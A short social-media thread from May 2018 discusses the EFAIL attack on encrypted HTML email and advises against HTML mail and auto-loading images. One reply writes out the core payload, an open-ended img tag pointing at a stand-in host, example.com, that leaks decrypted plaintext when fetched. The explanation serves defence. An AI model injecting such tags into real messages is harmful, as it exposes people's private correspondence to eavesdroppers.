**rixx 🏴** @rixx · 2018-05-14T10:08:02Z

rixx 🏴 @rixx

Ah, they've published their paper, but the tl;dr seems to be: Don't use HTML mails. If you receive an encrypted HTML mail, don't load external ressources. It's a nice attack, sure, but not trusting HTML mails in the first place is hardly a novel concept. Details: https://efail.de/ #gpg #pgp

May 14, 2018, 10:08 · Web · 37 · 17

**Porkhaus** @porkhaus@unixcorn.xyz · May 14, 2018, 14:38

**Porkhaus** @porkhaus@unixcorn.xyz · May 14, 2018, 14:38

@rixx
Yes, it appears that PGP (GPG) is NOT BROKEN per se, or at least not in a concerning way (the second attack worries me a bit more as it might allow forging the content, but that should be already mitigated by signature checking).

As usual, do not enable HTML nor auto-fetching of images. The attacks work by prepending an open-ended

<img src="example.com/

Tag to the e-mail body. example.com is then able to retrieve the whole plain-text when the image URL is fetched.

#efail

**Sebastian** @webmind@social.weho.st · May 17, 2018, 08:22

**Sebastian** @webmind@social.weho.st · May 17, 2018, 08:22

@rixx @jd

However many organisations push you in accepting them. Not being able to view newsletters for instance